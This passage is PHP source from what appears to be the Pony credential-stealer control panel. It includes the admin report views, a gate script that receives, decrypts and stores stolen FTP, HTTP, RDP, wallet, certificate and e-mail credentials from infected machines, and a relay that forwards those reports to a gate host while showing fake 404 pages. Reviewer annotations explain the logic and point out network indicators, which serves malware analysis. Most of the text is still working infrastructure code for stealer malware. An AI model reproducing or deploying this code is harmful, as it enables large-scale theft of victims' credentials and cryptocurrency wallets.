  1404. $log_item_result = $pony_db->get_log_item($log_id);
  1405. $report_item_result = $pony_db->get_report_item($report_id);
  1406.  
  // Enrich the report row with the country code and name derived from its source IP.
  1407. if ($pony_db->state && is_array($report_item_result))
  1408. {
  1409. $report_item_result['report_source_ip_country_code'] = geo_ip_country_code($report_item_result['report_source_ip']);
  1410. $report_item_result['report_source_ip_country_name'] = geo_ip_country_name($report_item_result['report_source_ip']);
  1411. }
  1412. $smarty->assign('report', $report_item_result);
  1413. $smarty->assign('log_item', $log_item_result);
  1414. $smarty->display('view_report.tpl');
  1415.  
  1416. if ($pony_db->state && is_array($report_item_result))
  1417. {
  // Emit a wait indicator and flush output before the parsing work starts; the
  // script block echoed at the end hides it again.
  1418. echo "<p id='wait_report_data'><span class='wait'></span></p>";
  1419.  
  1420. my_flush();
  1421.  
  1422. if ($admin_routine == 'reparse')
  1423. {
  // Snapshot row counts so the number of newly added items can be reported
  // after the stored report data has been parsed again.
  1424. $ftp_count_before_reparse = $pony_db->get_report_linked_passwords_count($report_id);
  1425. $cert_count_before_reparse = $pony_db->get_table_row_count(CPONY_CERT_TABLE);
  1426. $wallet_count_before_reparse = $pony_db->get_table_row_count(CPONY_WALLET_TABLE);
  1427. $email_count_before_reparse = $pony_db->get_table_row_count(CPONY_EMAIL_TABLE);
  1428.  
  1429. $report = new report_parser($pony_report_options);
  1430. $parse_result = $report->process_report($report_item_result['data'], $pony_db_report_password);
  1431. if ($parse_result)
  1432. {
  // HTTP lines are merged in only when HTTP mode is enabled; RDP lines are
  // always merged; e-mail lines are passed on only when e-mail mode is enabled.
  1433. if ($enable_http_mode)
  1434. $url_list_array = array_merge($report->ftp_lines, $report->http_lines);
  1435. else
  1436. $url_list_array = $report->ftp_lines;
  1437.  
  1438. $url_list_array = array_merge($url_list_array, $report->rdp_lines);
  1439.  
  1440. if ($enable_email_mode)
  1441. {
  1442. $email_lines = $report->email_lines;
  1443. } else
  1444. {
  1445. $email_lines = null;
  1446. }
  1447.  
  1448. $pony_db->update_parsed_report($report_id, $report->report_os_name, $report->report_is_win64, $report->report_is_admin,
  1449. $report->report_hwid, $report->report_version_id, $url_list_array, null, $report->cert_lines, $report->wallet_lines, $email_lines);
  // Stored parse errors for this report are dropped when the new run logged nothing.
  1450. if (!count($report->log->log_lines))
  1451. {
  1452. $pony_db->report_remove_errors($report_id);
  1453. }
  1454. }
  // 'parse_new_ftp' is the combined increase across linked passwords,
  // certificates, wallets and e-mail rows, not FTP entries alone.
  1455. $smarty->assign('parse_result', $parse_result);
  1456. $smarty->assign('parse_new_ftp', $pony_db->get_report_linked_passwords_count($report_id)-$ftp_count_before_reparse
  1457. + $pony_db->get_table_row_count(CPONY_CERT_TABLE)-$cert_count_before_reparse
  1458. + $pony_db->get_table_row_count(CPONY_WALLET_TABLE)-$wallet_count_before_reparse
  1459. + $pony_db->get_table_row_count(CPONY_EMAIL_TABLE)-$email_count_before_reparse);
  1460. clear_floating_offsets($pony_db);
  1461. }
  1462.  
  // The report is parsed a second time with verbose logging and the FTP filter
  // list bypassed, purely to produce the debug trace shown below; both globals
  // are restored to their previous values at the end of this block.
  1463. // enable debug mode
  1464. global $global_verbose_log, $global_allow_all_ftp;
  1465. $old_global_verbose_log = $global_verbose_log;
  1466. $old_global_allow_all_ftp = $global_allow_all_ftp;
  1467.  
  1468. $global_verbose_log = true;
  1469. $global_allow_all_ftp = true;
  1470.  
  1471. $report = new report_parser($pony_report_options);
  1472. $parse_result = $report->process_report($report_item_result['data'], $pony_db_report_password);
  1473.  
  // Log lines tagged NOTIFY_NEW_HTTP: or NOTIFY_NEW_EMAIL: are shown only when
  // the matching mode is enabled and the viewer is an admin or that data type is
  // visible to ordinary users; every other line is always shown.
  1474. $log = $report->log->log_lines;
  1475. $log_list = array();
  1476. foreach ($log as $log_list_item)
  1477. {
  1478. list($log_line, $log_extra) = $log_list_item;
  1479. if (strpos($log_line, 'NOTIFY_NEW_HTTP:') !== false)
  1480. {
  1481. if ($enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
  1482. {
  1483. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
  1484. }
  1485. } else if (strpos($log_line, 'NOTIFY_NEW_EMAIL:') !== false)
  1486. {
  1487. if ($enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
  1488. {
  1489. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
  1490. }
  1491. } else
  1492.  
  1493. array_push($log_list, array('log_line'=>$log_line, 'log_extra'=>$log_extra));
  1494.  
  1495. }
  1496.  
  1497. $smarty->assign('log_list', $log_list);
  1498. $smarty->display('debug_report.tpl');
  1499.  
  1500. echo '<script type="text/javascript">
  1501. //<![CDATA[
  1502. $("#wait_report_data").hide();
  1503. //]]>
  1504. </script>';
  1505.  
  1506. // revert debug mode change
  1507. $global_verbose_log = $old_global_verbose_log;
  1508. $global_allow_all_ftp = $old_global_allow_all_ftp;
  1509. }
  1510. }
  1511.  
  // Report list view, used for every routine other than the three detail routines.
  1512. if ($admin_routine != 'view_report' && $admin_routine != 'reparse' && $admin_routine != 'confirm_delete')
  1513. {
  // Request parameters read here: filter_string, filter_ip, filter_hwid,
  // filter_nonparsed, filter_has_passwords, next.
  1514. $filter_string = trim(assign($_REQUEST['filter_string']));
  1515. $filter_ip = trim(assign($_REQUEST['filter_ip']));
  1516. $filter_hwid = trim(assign($_REQUEST['filter_hwid']));
  1517. $filter_nonparsed = trim(assign($_REQUEST['filter_nonparsed']));
  1518. $filter_has_passwords = trim(assign($_REQUEST['filter_has_passwords']));
  1519. $next = trim(assign($_REQUEST['next']));
  1520. if (strlen($next) == 0)
  1521. $next = '0';
  1522. $next = intval($next);
  1523.  
  1524. if ($next > 0)
  1525. $next--;
  1526.  
  1527. $total_items_count = $pony_db->get_report_row_count_filter($filter_ip, $filter_hwid, $filter_nonparsed, $filter_has_passwords, $filter_string);
  1528. $max_results = 25;
  1529.  
  1530. $report_list = array();
  1531. $pony_db->get_report_list_filter($report_list, $next, $max_results, $filter_ip, $filter_hwid, $filter_nonparsed, $filter_has_passwords, $filter_string);
  1532. $geo_ip = new GeoIP();
  1533.  
  // Add a display country name for rows that carry a non-empty country code.
  1534. foreach ($report_list as $report_list_item => $report_list_value)
  1535. {
  1536. if (isset($report_list[$report_list_item]['report_country']) && strlen($report_list[$report_list_item]['report_country']))
  1537. {
  1538. $report_list[$report_list_item]['report_country_name'] = geoip_country_code_to_country_name($geo_ip, $report_list[$report_list_item]['report_country']);
  1539. } else
  1540. {
  1541. $report_list[$report_list_item]['report_country_name'] = '';
  1542. }
  1543. }
  1544.  
  // Active filters are appended to the pagination URL, passed through
  // htmlspecialchars() with the cp1251 charset. filter_nonparsed takes
  // precedence: filter_has_passwords is appended only when filter_nonparsed is empty.
  1545. $filter = '';
  1546. if (strlen($filter_string))
  1547. $filter .= '&filter_string='.htmlspecialchars($filter_string, ENT_QUOTES, 'cp1251');
  1548. if (strlen($filter_ip))
  1549. $filter .= '&filter_ip='.htmlspecialchars($filter_ip, ENT_QUOTES, 'cp1251');
  1550. if (strlen($filter_hwid))
  1551. $filter .= '&filter_hwid='.htmlspecialchars($filter_hwid, ENT_QUOTES, 'cp1251');
  1552.  
  1553. if (strlen($filter_nonparsed))
  1554. $filter .= '&filter_nonparsed='.htmlspecialchars($filter_nonparsed, ENT_QUOTES, 'cp1251');
  1555. elseif (strlen($filter_has_passwords))
  1556. $filter .= '&filter_has_passwords='.htmlspecialchars($filter_has_passwords, ENT_QUOTES, 'cp1251');
  1557.  
  // Pagination links take the form <self_file>?token=<token>&action=reports plus
  // the filter string; 25 rows per page, page limit 50.
  1558. SmartyPaginate::disconnect();
  1559. SmartyPaginate::connect();
  1560. SmartyPaginate::setURL($self_file."?token=".$token."&action=reports".$filter);
  1561. SmartyPaginate::setTotal($total_items_count);
  1562. SmartyPaginate::setLimit($max_results);
  1563. SmartyPaginate::setPageLimit(50);
  1564.  
  1565. SmartyPaginate::setPrevText($lang['Previous']);
  1566. SmartyPaginate::setNextText($lang['Next']);
  1567. SmartyPaginate::assign($smarty);
  1568.  
  1569. smarty_assign_common_vars($smarty, $pony_db);
  1570. $smarty->assign("report_list", $report_list);
  1571. $smarty->display('report_list.tpl');
  1572. }
  1573. }
  1574. else if ($admin_action == 'admin')
  1575. {
  1576. // ---------------------------------------------------------------------------------------
  1577. // User management
  1578.  
  1579. if ($admin_routine == 'rebuild_tables')
  1580. {
  1581. if ($pony_db->priv_is_admin())
  1582. {
  1583. if ($pony_db->drop_table(CPONY_FTP_TABLE) && $pony_db->drop_table(CPONY_REPORT_TABLE) && $pony_db->drop_table(CPONY_REPORT_DATA_TABLE) &&
  1584. $pony_db->drop_table(CPONY_LOG_TABLE) && $pony_db->drop_table(CPONY_CERT_TABLE) && $pony_db->drop_table(CPONY_WALLET_TABLE) && $pony_db->drop_table(CPONY_EMAIL_TABLE) &&
  1585. $pony_db->drop_table(CPONY_DOMAINLIST_TABLE) &&
  1586. $pony_db->create_data_tables()
  1587. && $pony_db->state)
  1588. show_smarty_success($smarty);
  1589. else
  1590. show_smarty_error($smarty);
  1591. clear_floating_offsets($pony_db);
  1592. } else
  1593. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1594. }
  1595. elseif ($admin_routine == 'optimize_tables')
  1596. {
  1597. if ($pony_db->priv_is_admin())
  1598. {
  1599. if ($pony_db->optimize_table(CPONY_FTP_TABLE) && $pony_db->optimize_table(CPONY_REPORT_TABLE) && $pony_db->optimize_table(CPONY_REPORT_DATA_TABLE) && $pony_db->optimize_table(CPONY_DOMAIN_TABLE) &&
  1600. $pony_db->optimize_table(CPONY_LOG_TABLE) && $pony_db->optimize_table(CPONY_USER_TABLE) && $pony_db->optimize_table(CPONY_CERT_TABLE) && $pony_db->optimize_table(CPONY_WALLET_TABLE) && $pony_db->optimize_table(CPONY_EMAIL_TABLE) &&
  1601. $pony_db->optimize_table(CPONY_DOMAINLIST_TABLE)
  1602. && $pony_db->state)
  1603. show_smarty_success($smarty);
  1604. else
  1605. show_smarty_error($smarty);
  1606. clear_floating_offsets($pony_db);
  1607. } else
  1608. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1609. }
  1610. elseif ($admin_routine == 'delete')
  1611. {
  1612. if ($pony_db->priv_is_admin())
  1613. {
  1614. if ($pony_db->delete_user(trim(assign($_REQUEST['user_id']))))
  1615. show_smarty_success($smarty);
  1616. else
  1617. show_smarty_error($smarty);
  1618. } else
  1619. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1620. } elseif ($admin_routine == 'add')
  1621. {
  1622. $priv = trim(assign($_REQUEST['privileges']));
  1623. $new_login = trim(assign($_REQUEST['new_login']));
  1624. $new_password = trim(assign($_REQUEST['new_password']));
  1625.  
  1626. if ($priv != 'user_all')
  1627. $priv = 'user_view_only';
  1628.  
  1629. if ($pony_db->priv_is_admin())
  1630. {
  1631. if ($pony_db->add_user($new_login, $new_password, $priv))
  1632. show_smarty_success($smarty);
  1633. else
  1634. show_smarty_error($smarty);
  1635. } else
  1636. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1637. } else if ($admin_routine == 'edit')
  1638. {
  1639. $user_id = trim(assign($_REQUEST['user_id']));
  1640. $priv = trim(assign($_REQUEST['privileges']));
  1641. $new_password = trim(assign($_REQUEST['new_password']));
  1642.  
  1643. if ($new_password == 'current_HASH_value')
  1644. $new_password = '';
  1645.  
  1646. if ($priv != 'user_all')
  1647. $priv = 'user_view_only';
  1648.  
  1649. if ($pony_db->priv_is_admin())
  1650. {
  1651. if ($pony_db->update_user($user_id, $new_password, $priv))
  1652. show_smarty_success($smarty);
  1653. else
  1654. show_smarty_error($smarty);
  1655. } else
  1656. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1657. } else if ($admin_routine == 'update_server_settings')
  1658. {
  1659. // Server settings
  1660. if ($pony_db->priv_is_admin())
  1661. {
  1662. $report_password = trim(assign($_REQUEST['report_password']));
  1663. $sftp_user = trim(assign($_REQUEST['sftp_user']));
  1664. if (!strlen($sftp_user)) $sftp_user = '0';
  1665. $sftp_port = trim(assign($_REQUEST['sftp_port']));
  1666. if (!strlen($sftp_port)) $sftp_port = '';
  1667. $sftp_protocol = trim(assign($_REQUEST['sftp_protocol']));
  1668. if (!strlen($sftp_protocol)) $sftp_protocol = '';
  1669.  
  1670. if ($pony_db->set_option('report_password', $report_password) &&
  1671. $pony_db->set_option('sftp_user', $sftp_user) &&
  1672. $pony_db->set_option('sftp_port', $sftp_port) &&
  1673. $pony_db->set_option('sftp_protocol', $sftp_protocol)
  1674. )
  1675. show_smarty_success($smarty);
  1676. else
  1677. show_smarty_error($smarty);
  1678. } else
  1679. show_smarty_error($smarty, 'ERR_NOT_ENOUGH_PRIVILEGES');
  1680. } else if ($admin_routine == 'change_password')
  1681. {
  1682. $current_password = trim(assign($_REQUEST['current_password']));
  1683. $new_password = trim(assign($_REQUEST['new_password']));
  1684. $confirm_password = trim(assign($_REQUEST['confirm_password']));
  1685.  
  1686. if ($pony_db->check_password($current_password))
  1687. {
  1688. if ($new_password == $confirm_password)
  1689. {
  1690. if (strlen($new_password))
  1691. {
  1692. if ($pony_db->change_password($new_password))
  1693. show_smarty_success($smarty);
  1694. else
  1695. show_smarty_error($smarty, '', '?action=admin&amp;routine=change_pass_form');
  1696. } else
  1697. show_smarty_error($smarty, 'ERR_EMPTY_PASSWORD', '?action=admin&amp;routine=change_pass_form');
  1698. } else
  1699. show_smarty_error($smarty, 'ERR_PASSWORD_MISMATCH', '?action=admin&amp;routine=change_pass_form');
  1700. } else
  1701. show_smarty_error($smarty, 'ERR_WRONG_PASSWORD', '?action=admin&amp;routine=change_pass_form');
  1702. }
  1703.  
  1704. if ($admin_routine == 'edit_form')
  1705. {
  1706. $user_id = trim(assign($_REQUEST['user_id']));
  1707. if ($pony_db->priv_is_admin())
  1708. {
  1709. $user_data = $pony_db->get_user_data($user_id);
  1710. if (is_array($user_data) && $user_data && $pony_db->priv_is_user($user_data['privileges']))
  1711. {
  1712. $smarty->assign('user_data', $user_data);
  1713. }
  1714. }
  1715. }
  1716.  
  1717. $user_list = array();
  1718. if ($pony_db->priv_is_admin())
  1719. {
  1720. $pony_db->get_user_list($user_list);
  1721. $smarty->assign('report_password', $pony_db_report_password);
  1722.  
  1723. $smarty->assign('sftp_user', assign($pony_report_options['sftp_user']));
  1724. $smarty->assign('sftp_port', assign($pony_report_options['sftp_port']));
  1725. $smarty->assign('sftp_protocol', assign($pony_report_options['sftp_protocol']));
  1726. }
  1727.  
  1728. $smarty->assign('user_list', $user_list);
  1729. $smarty->display('management.tpl');
  1730. }
  1731. else if ($admin_action == 'help')
  1732. {
  1733. // ---------------------------------------------------------------------------------------
  1734. // Help contents
  1735.  
  1736. $module_names = array();
  1737.  
  1738. foreach ($global_module_list as $module)
  1739. {
  1740. array_push($module_names, $module[2]);
  1741. }
  1742. $smarty->assign('module_names', $module_names);
  1743. $smarty->display("help.tpl");
  1744. }
  1745. else if (strlen($admin_action) == 0)
  1746. {
  1747. // ---------------------------------------------------------------------------------------
  1748. // Home page
  1749. // Installation Check
  1750. if (!install_check(false, false))
  1751. {
  1752. show_smarty_error($smarty, 'ERR_SRV_CONFIGURATION');
  1753. echo '<div id="achtung" style="margin-bottom:20px">';
  1754. install_check(true, true);
  1755. echo '</div>';
  1756. }
  1757.  
  1758. // Latest logins
  1759. $latest_login_list = array();
  1760. $pony_db->get_login_log($latest_login_list, 5);
  1761.  
  1762. foreach ($latest_login_list as $login_key=>$login_item)
  1763. {
  1764. $latest_login_list[$login_key]['country_code'] = geo_ip_country_code($login_item['ip']);
  1765. $latest_login_list[$login_key]['country_name'] = geo_ip_country_name($login_item['ip']);
  1766. }
  1767.  
  1768. $smarty->assign("login_list", $latest_login_list);
  1769.  
  1770. // Domains
  1771. $domain_list = array();
  1772. $pony_db->get_domains($domain_list);
  1773.  
  1774. smarty_assign_common_vars($smarty, $pony_db);
  1775. $smarty->assign("domain_list", $domain_list);
  1776.  
  1777. $smarty->display("home.tpl");
  1778. }
  1779.  
  1780. $smarty->display('footer.tpl');
  1781. $smarty->unloadFilter('output', 'trimwhitespace');
  1782. $smarty->display('stopwatch.tpl');
  1783.  
  1784.  
  1785. ------
  1786. <?php
        // Gate (report receiver): reads the raw POST body, checks its length and header,
        // stores it through pony_db, parses it with report_parser and answers the sender
        // with a status marker. Lines without a gutter number are review annotations.
  1787.  
  1788. // turn off all error reporting
  1789. error_reporting(0);
  1790. @set_time_limit(0);
  1791. @ini_set('max_execution_time', 0);
  1792.  
  1793. // make sure included files do not generate extra output
  1794. ob_start();
  1795.  
        // $proxy_config is never assigned in this script; it is only honoured when a
        // script that includes this file has set it beforehand.
  1796. if (!isset($proxy_config))
  1797. {
  1798. // use local config file
  1799. $config_file = "config.php";
  1800. } else
  1801. {
  1802. // use proxy config file
  1803. $config_file = $proxy_config;
  1804. }
  1805.  
        // a missing config file ends the request with an empty response
  1806. file_exists($config_file) or die();
  1807.  
  1808. require_once($config_file);
  1809. require_once('includes/misc.php');
  1810. require_once('includes/password_modules.php');
  1811. require_once('includes/database.php');
  1812.  
  1813. // clean output buffer
  1814. ob_end_clean();
  1815.  
  1816. // connect and validate database
        // the $mysql_* values come from the required config file; the return value of
        // connect_db() is not checked here
  1817. $pony_db = new pony_db();
  1818. $pony_db->connect_db($mysql_host, $mysql_user, $mysql_pass, $mysql_database, false);
  1819.  
  1820. // set report decryption password
  1821. $pony_db_report_password = $pony_db->get_option('report_password', '', REPORT_DEFAULT_PASSWORD);
  1822. // set report parsing options
  1823. $pony_report_options = array('sftp_user' => $pony_db->get_option('sftp_user', '', '1'),
  1824. 'sftp_port' => $pony_db->get_option('sftp_port', '', '1'),
  1825. 'sftp_protocol' => $pony_db->get_option('sftp_protocol', '', '1'));
  1826.  
  1827. // default values for unset config variables
  1828. if (!isset($enable_http_mode))
  1829. $enable_http_mode = false;
  1830. if (!isset($enable_email_mode))
  1831. $enable_email_mode = false;
  1832.  
  1833. // client IP
        // get_client_ip() is defined outside this section.
        // NOTE(review): confirm which request fields it trusts for the address.
  1834. $ip = get_client_ip();
  1835.  
  1836. // get report data
        // CONTENT_LENGTH is absent on body-less requests; intval() then yields 0 and the
        // resulting notice is hidden by error_reporting(0)
  1837. $real_length = intval($_SERVER['CONTENT_LENGTH']);
  1838. $received_report_data = file_get_contents('php://input');
  1839.  
  1840. // check if data was received in full
        // a mismatch ends the request silently: no log line, empty response
  1841. if ($real_length !== strlen($received_report_data))
  1842. die();
  1843.  
  1844. $report_id = 0;
  1845.  
  1846. // report data length should be between 12 bytes and 900 Kb (default mysql query max. length)
        // as coded: strictly more than 12 bytes and at most 921600 bytes
  1847. $max_db_len_size = 1024*900;
  1848. if (strlen($received_report_data) > 12 && strlen($received_report_data) <= $max_db_len_size)
  1849. {
        // a body that fails this header check gets no log line and no response body
  1850. if (report_parser::verify_report_file_header($received_report_data))
  1851. {
  1852. $report_status_ok = false;
  1853. $ip_country = geo_ip_country_code($ip);
  1854. $report_new_encryption = false;
  1855.  
  1856. // check if new random encryption is used
  1857. if (report_parser::verify_new_file_header($received_report_data))
  1858. {
  1859. $report_new_encryption = true;
  1860. }
  1861.  
        // verify_new_file_header() is evaluated a second time here instead of reusing
        // $report_new_encryption
  1862. if (report_parser::check_report_crypted_header($received_report_data) || report_parser::verify_new_file_header($received_report_data))
  1863. {
  1864. // try to pre-decrypt report data
  1865. report_parser::pre_decrypt_report($received_report_data, $pony_db_report_password);
  1866. }
  1867.  
  1868. // add non parsed report
        // the report is stored before parsing, together with sender IP and GeoIP country code
  1869. $report_id = $pony_db->add_nonparsed_report($ip, $ip_country, $received_report_data);
  1870.  
  1871. if ($report_id)
  1872. {
  1873. // there's new report available for parsing
  1874. $report = new report_parser($pony_report_options);
  1875.  
  1876. // process report
        // error reporting is raised to E_ALL only around the parser so that anything it
        // prints is captured in $ob_data instead of reaching the sender
  1877. ob_start(); // detect report processing noise
  1878. error_reporting(E_ALL);
  1879. $parse_result = $report->process_report($received_report_data, $pony_db_report_password);
  1880. $ob_data = trim(ob_get_contents());
  1881. error_reporting(0);
  1882. ob_end_clean();
  1883.  
  1884. if ($parse_result)
  1885. {
  1886. $report_status_ok = true;
  1887.  
        // FTP lines are always kept; HTTP lines only when $enable_http_mode is set
  1888. if ($enable_http_mode)
  1889. $url_list_array = array_merge($report->ftp_lines, $report->http_lines);
  1890. else
  1891. $url_list_array = $report->ftp_lines;
  1892.  
  1893. $url_list_array = array_merge($url_list_array, $report->rdp_lines);
  1894.  
  1895. if ($enable_email_mode)
  1896. {
  1897. $email_lines = $report->email_lines;
  1898. }
  1899. else
  1900. {
  1901. $email_lines = null;
  1902. }
  1903.  
        // fields written per report: OS name, 64-bit flag, admin flag, hardware id,
        // version id, URL list, parser log, certificate, wallet and e-mail lines
  1904. $pony_db->update_parsed_report($report_id, $report->report_os_name, $report->report_is_win64, $report->report_is_admin,
  1905. $report->report_hwid, $report->report_version_id, $url_list_array, $report->log->log_lines, $report->cert_lines, $report->wallet_lines, $email_lines);
  1906.  
  1907. if (strlen($ob_data))
  1908. {
        // NOTE(review): $log_extra is not assigned anywhere in this script; unless an
        // included file defines it, null is passed here
  1909. $pony_db->add_log_line('ERR_EXTRA_NOISE: '.$ob_data, CLOG_SOURCE_REPORT, $report_id, $log_extra);
  1910. }
  1911. } else
  1912. {
  1913. // parse error, write logs
  1914. $log = $report->log->log_lines;
  1915. $pony_db->import_log_list($log, CLOG_SOURCE_REPORT, $report_id);
  1916. }
  1917. } else if ($pony_db->state)
  1918. {
        // no report id was returned while the database state is still good; the log key
        // indicates this case is treated as a duplicate submission and acknowledged
  1919. $report_status_ok = true;
  1920. $pony_db->add_log_line('NOTIFY_GATE_DUPLICATE_REPORT', CLOG_SOURCE_GATE, null, $ip);
  1921. }
  1922.  
  1923. // check report parsing state and return success status for the client
        // the marker goes out in clear for the older report format and is passed through
        // rc4_rand_crypt() (defined elsewhere) when the newer header was detected; the
        // clear-text form is a usable network signature for the response body
  1924. if ($report_status_ok)
  1925. {
  1926. $response_msg = 'STATUS-IMPORT-OK';
  1927. if ($report_new_encryption)
  1928. $response_msg = rc4_rand_crypt($response_msg);
  1929. echo $response_msg;
  1930. }
  1931. }
  1932. } else
  1933. {
  1934. if (strlen($received_report_data) == 0)
  1935. {
  1936. // received empty report
  1937. // return 404
        // a request without a body is logged and answered as a missing page, with the
        // contents of 404.html when that file exists
  1938. $pony_db->add_log_line('NOTIFY_GATE_RECEIVED_NULL_REPORT', CLOG_SOURCE_GATE, null, $ip);
  1939. header('HTTP/1.0 404 Not Found');
  1940. header('Status: 404 Not Found');
  1941. $_SERVER['REDIRECT_STATUS'] = 404;
  1942. if (file_exists('404.html'))
  1943. echo file_get_contents('404.html');
  1944. die();
  1945. }
        // bodies of 2..11 bytes are logged as wrong size and bodies above the limit as too
        // big; a body of exactly 1 or exactly 12 bytes matches no branch and is dropped
        // without a log line
  1946. else if (strlen($received_report_data) < 12 && strlen($received_report_data) > 1)
  1947. $pony_db->add_log_line('ERR_GATE_REPORT_WRONG_SIZE: '.strlen($received_report_data), CLOG_SOURCE_GATE, null, $ip);
  1948. else if (strlen($received_report_data) > $max_db_len_size)
  1949. $pony_db->add_log_line('ERR_GATE_REPORT_BIG_SIZE: '.strlen($received_report_data), CLOG_SOURCE_GATE, null, $ip);
  1950. }
  1951.  
  1952.  
  1953. ----
  1954. <?php
        // Relay script: accepts the same POST the gate expects and forwards it with curl to
        // $redirect_url, then returns the gate's answer to the sender. Lines without a
        // gutter number are review annotations.
  1955.  
        // as listed, the value is a private (RFC 1918) address, presumably the kit's
        // default rather than a deployed gate
  1956. $redirect_url = "http://192.168.1.101/gate.php"; // redirect URL (should point to the gate script)
  1957.  
  1958.  
  1959.  
  1960.  
  1961.  
  1962.  
  1963. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1964.  
  1965. error_reporting(0);
  1966. set_time_limit(0);
  1967. ini_set('max_execution_time', 0);
  1968.  
  1969. // check if curl is installed
  1970. $loaded_extensions = get_loaded_extensions();
  1971.  
        // without the curl extension the script exits with an empty response
  1972. if (array_search('curl', $loaded_extensions) === false)
  1973. die();
  1974.  
  1975. // check if data was received in full
        // CONTENT_LENGTH is absent on body-less requests; intval() then yields 0
  1976. $real_length = intval($_SERVER['CONTENT_LENGTH']);
  1977. $received_report_data = file_get_contents('php://input');
  1978.  
  1979. if ($real_length !== strlen($received_report_data))
  1980. die();
  1981.  
  1982. // extract host from redirect url
        // a scheme is prepended when the configured URL does not start with "http"
  1983. if (substr($redirect_url, 0, 4) != 'http')
  1984. $redirect_url = 'http://'.$redirect_url;
  1985.  
        // used later to rewrite the Host header of the forwarded request
  1986. $redirect_host = @parse_url($redirect_url, PHP_URL_HOST);
  1987.  
  1988. function my_upload($ch, $fp, $len)
  1989. {
        // Registered by curl_load() as CURLOPT_READFUNCTION: returns the next slice of at
        // most $len bytes of the request body. $ch and $fp are not used.
        // The whole of php://input is re-read on every call and sliced from a static
        // offset; because that offset is never reset, the function serves one transfer
        // per request. An empty slice is returned once the body is exhausted.
  1990. static $pos=0; // keep track of position
  1991. $post_data = file_get_contents('php://input');
  1992.  
  1993. $data = substr($post_data, $pos, $len);
  1994. $pos += strlen($data);
  1995. return $data;
  1996. }
  1997.  
  1998. function curl_load($url, &$data, $headers)
  1999. {
        // Sends a POST to $url with the given request headers and stores the raw response
        // (headers followed by body) in $data, which is passed by reference.
        // Returns true when curl reports no error, false otherwise ($data is then '').
  2000. clearstatcache();
  2001.  
  2002. $return = false;
  2003. $url = trim($url);
  2004.  
  2005. if (substr($url, 0, 4) != 'http') $url = 'http://'.$url;
  2006.  
  2007. $ch = curl_init($url);
  2008.  
  2009. if (!$ch)
  2010. return false;
  2011.  
        // CURLOPT_HEADER keeps the response headers in the returned string;
        // CURLOPT_FAILONERROR makes an HTTP status of 400 or above count as a curl error,
        // so such answers take the failure path below
  2012. curl_setopt($ch, CURLOPT_HEADER, true);
  2013. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2014. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
  2015. curl_setopt($ch, CURLOPT_TIMEOUT, 60);
  2016. curl_setopt($ch, CURLOPT_FAILONERROR, true);
  2017. curl_setopt($ch, CURLOPT_FRESH_CONNECT, true);
  2018. curl_setopt($ch, CURLOPT_DNS_USE_GLOBAL_CACHE, false);
  2019. curl_setopt($ch, CURLOPT_POST, true);
  2020.  
        // asks the upstream server for an uncompressed response; $headers is a by-value
        // copy, so the caller's array is not modified
  2021. array_push($headers, 'Accept-Encoding: identity, *;q=0');
  2022. curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  2023.  
        // the body is only checked for presence here; it is streamed by my_upload()
  2024. $post_data = file_get_contents('php://input');
  2025. if (strlen($post_data))
  2026. {
  2027. curl_setopt($ch, CURLOPT_READFUNCTION, 'my_upload');
  2028. }
  2029.  
  2030. $curl_execute_result = @curl_exec($ch);
  2031.  
  2032. // Check if any error occurred
  2033. if (!curl_errno($ch))
  2034. {
  2035. $data = $curl_execute_result;
  2036. $return = true;
  2037. } else
  2038. {
  2039. $data = '';
  2040. $return = false;
  2041. }
  2042. curl_close($ch);
  2043.  
  2044. return $return;
  2045. }
  2046.  
  2047. function parse_lines($value)
  2048. {
        // Splits $value into an array of lines, treating a lone \r, a lone \n and the
        // pair \r\n each as a single line break.
  2049. return preg_split("/((\r(?!\n))|((?<!\r)\n)|(\r\n))/", $value);
  2050. }
  2051.  
        // Builds the forwarded request (query string and headers), sends it through
        // curl_load() and relays the upstream response to the sender.
        // Lines without a gutter number are review annotations.
  2052. $original_query = trim(@parse_url($redirect_url, PHP_URL_QUERY));
  2053.  
        // continue an existing query string with '&', otherwise start one with '?'
  2054. if (!strlen($original_query))
  2055. $query_string = '?';
  2056. else
  2057. $query_string = '&';
  2058.  
        // the sender's query string is appended unchanged, followed by a pass_ip parameter
        // carrying the address this relay saw; a pass_ip parameter on requests to the gate
        // URL is therefore an indicator that a relay of this kind sits in front of it
  2059. $query_string .= $_SERVER['QUERY_STRING'];
  2060. $query_string .= '&pass_ip='.$_SERVER['REMOTE_ADDR'];
  2061.  
  2062. $data = '';
  2063. $headers = getallheaders();
  2064. $curl_headers_array = array();
  2065.  
        // Accept-Encoding and Connection are dropped, Host is rewritten to the gate's host,
        // every other request header is forwarded as received
  2066. foreach ($headers as $name=>$value)
  2067. {
  2068. if (strtolower($name) == 'accept-encoding' || strtolower($name) == 'connection')
  2069. {
  2070. }
  2071. elseif (strtolower($name) == 'host')
  2072. {
  2073. array_push($curl_headers_array, $name.': '.$redirect_host);
  2074. } else
  2075. {
  2076. array_push($curl_headers_array, $name.': '.$value);
  2077. }
  2078. }
  2079.  
        // any upstream failure is presented to the sender as a missing page, with the
        // contents of 404.html when that file exists
  2080. if (!curl_load($redirect_url.$query_string, $data, $curl_headers_array))
  2081. {
  2082. header("HTTP/1.0 404 Not Found");
  2083. header("Status: 404 Not Found");
  2084. $_SERVER['REDIRECT_STATUS'] = 404;
  2085. if (file_exists('404.html'))
  2086. echo file_get_contents('404.html');
  2087. die();
  2088. }
  2089.  
        // locate the header/body boundary: \r\n\r\n first, then \n\n as a fallback;
        // $data_start_pos from the first attempt is only used when that attempt succeeded
  2090. $headers_end_pos = strpos($data, "\r\n\r\n");
  2091. $data_start_pos = $headers_end_pos+4;
  2092. if ($headers_end_pos === false)
